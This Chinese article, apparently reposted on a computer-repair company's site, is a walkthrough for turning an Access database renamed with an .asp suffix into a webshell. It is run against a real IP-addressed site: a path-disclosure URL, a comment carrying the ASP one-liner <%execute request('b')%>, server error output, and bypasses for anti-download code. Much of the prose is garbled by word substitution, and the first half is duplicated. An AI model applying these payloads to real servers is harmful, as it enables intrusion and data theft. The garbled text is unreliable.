设为主页 | 加入收藏 | 繁體中文

后缀被改为asp的安全隐患

  可能是随着网络安全技术的生长吧,管理员的本质都在进步,在使用access+asp体系时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等东西直接下载,其实如许你曾经是为入侵者翻开了大门。入侵者可以使用asp/asa为后缀的数据库直接得到webshell。
  一.思绪
  大家都知道<%%>为asp文件的标记符,也便是说一个asp文件只会去执行<% %>之间的代码,access+asp的web体系的全部数据都是寄存在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。如许导致我们只提交歹意代码给数据库,那么asp后缀的数据库便是我们的webshell了。
  二.示例
  随便找个目的,首先我们暴库,看是不是asp后缀的数据库:
  http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
  返回:
  Microsoft VBScript 编译器错误 错误 '800a03f6'
  短少 'End'
  /iisHelp/common/500-100.asp,行242
  Microsoft JET Database Engine 错误 '80004005'
  'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径称号拼写能否正确,以及能否连接到文件寄存的办事器。
  /test/conn.asp,行18
  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,如许我们可以直接用网际慢车等东西直接下载数据库(这里我们不讨论)。我们回到主页看到有提供"网友评论"功能。我们注册个用户,发一条评论:
  < %execute request("b")%>
  如许我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:便是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的末了我们看到:
  /iisHelp/common/500-100.asp,行242
  Microsoft VBScript 运行时错误 错误 '800a000d'
  范例不立室: 'execute'
  /test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
  哈哈,我们的拔出的代码运行了。
  http://www.4ngel.net/img/acc.gif
  本文作者:SuperHei·Lilo
  来自:安全天使
  可能是随着网络安全技术的生长吧,管理员的本质都在进步,在使用access+asp体系时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等东西直接下载,其实如许你曾经是为入侵者翻开了大门。入侵者可以使用asp/asa为后缀的数据库直接得到webshell。
  一.思绪
  大家都知道<%%>为asp文件的标记符,也便是说一个asp文件只会去执行<% %>之间的代码,access+asp的web体系的全部数据都是寄存在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。如许导致我们只提交歹意代码给数据库,那么asp后缀的数据库便是我们的webshell了。
  二.示例
  随便找个目的,首先我们暴库,看是不是asp后缀的数据库:
  http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
  返回:
  Microsoft VBScript 编译器错误 错误 '800a03f6'
  短少 'End'
  /iisHelp/common/500-100.asp,行242
  Microsoft JET Database Engine 错误 '80004005'
  'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径称号拼写能否正确,以及能否连接到文件寄存的办事器。
  /test/conn.asp,行18
  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,如许我们可以直接用网际慢车等东西直接下载数据库(这里我们不讨论)。我们回到主页看到有提供"网友评论"功能。我们注册个用户,发一条评论:
  < %execute request("b")%>
  如许我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:便是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的末了我们看到:
  /iisHelp/common/500-100.asp,行242
  Microsoft VBScript 运行时错误 错误 '800a000d'
  范例不立室: 'execute'
  /test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
  哈哈,我们的拔出的代码运行了。如下图:
  注意:我们在向数据库提交代码时,代码内容不可以太大。以是我们采用<%execute request("b")%>。
  三.其他一些问题和思绪
  1.对付改了后缀为asp,还对数据库里加入了<%='a'-1%>等非法的asp代码来彻底防备下载的数据库,由于里面存在了非法的asp代码,拔出我们的webshell代码后运行,将只会表现前面非法代码的错误,而不去执行我们shell的代码。虽然如许可以防备肯定的打击,但照旧存在肯定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确表现执行我们拔出的webshell代码了。
  2.对付没有改后缀的,也便是mdb文件,如许我们可以先直接下载下来得到背景密码,进了背景,可以使用数据库备用改后缀为asp。
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: